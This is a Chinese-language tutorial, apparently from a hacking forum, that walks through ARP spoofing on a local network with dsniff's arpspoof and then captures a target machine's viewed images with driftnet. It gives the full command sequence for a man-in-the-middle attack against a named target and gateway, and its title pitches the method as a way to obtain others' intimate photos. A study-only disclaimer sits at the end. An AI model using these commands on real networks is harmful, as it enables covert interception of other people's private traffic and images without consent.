欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

Dsniff嗅探网络图片法则-下一个艳门照的产生地!

来源:本站整理 作者:佚名 时间:2017-02-19 TAG: 我要投稿

一、思路:通过ARP欺骗获得其他电脑的数据,并对数据进行筛选截取图片
二、测试环境:
攻击机:192.168.1.188
网关:192.168.1.1
目标机:192.168.1.108
使用系统:UBUNTU64位14.04版
软件环境:DSNIFF、DRIFTNET
三、方法:
首先安装所需软件,使用下列代码安装
代码:
SUDO APT-GET INSTALL DSNIFF
SUDO APT-GET INSTALL DRIFTNET
如果出现找不到软件的错误提示,请使用sudo apt-get update更新源。
1、打开一个终端,切换到ROOT权限下,并开启路由转发功能,不开启路由转发而使用后续指令会造
成对方断网。
代码:
SUDO SU
ECHO  “1” > /PROC/SYS/NET/IPV4/IP_FORWARD
见下图1

2、进行ARP欺骗,目的:将目标机192.168.1.108发送到路由器192.168.1.1的数据先发送给攻击机
192.168.1.188。
代码:
SUDO SU
ARPSPOOF -I WLAN0 -T 192.168.1.108 192.168.1.1
见图2,(说明:我这里使用的是无线网卡,所以用的是wlan0,默认是eth0)

3、再打开一个终端,切换到ROOT权限,并输入以下指令,目的是将路由器192.168.1.1发往目标机
192.168.1.108的数据先发送攻击机192.168.1.188,然后再转发!
代码:
SUDO SU
ARPSPOOF -I WLAN0 192.168.1.1 192.168.1.108
见图3,请细看,2和3的指令是不一样的。

4、此时,对网卡进行监听,打开终端,输入以下代码:
代码:
SUDO SU
DRIFTNET -I WLAN0
见图4。也可以加-d参数将嗅探的图片保存在临时目录。

5、这时候目标机在网络中传送图片信息会显卡在driftnet窗口里。见附图测试结果。driftnet窗口可以最大化,我这里是为了方便,所以未最大化。
见图5。

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载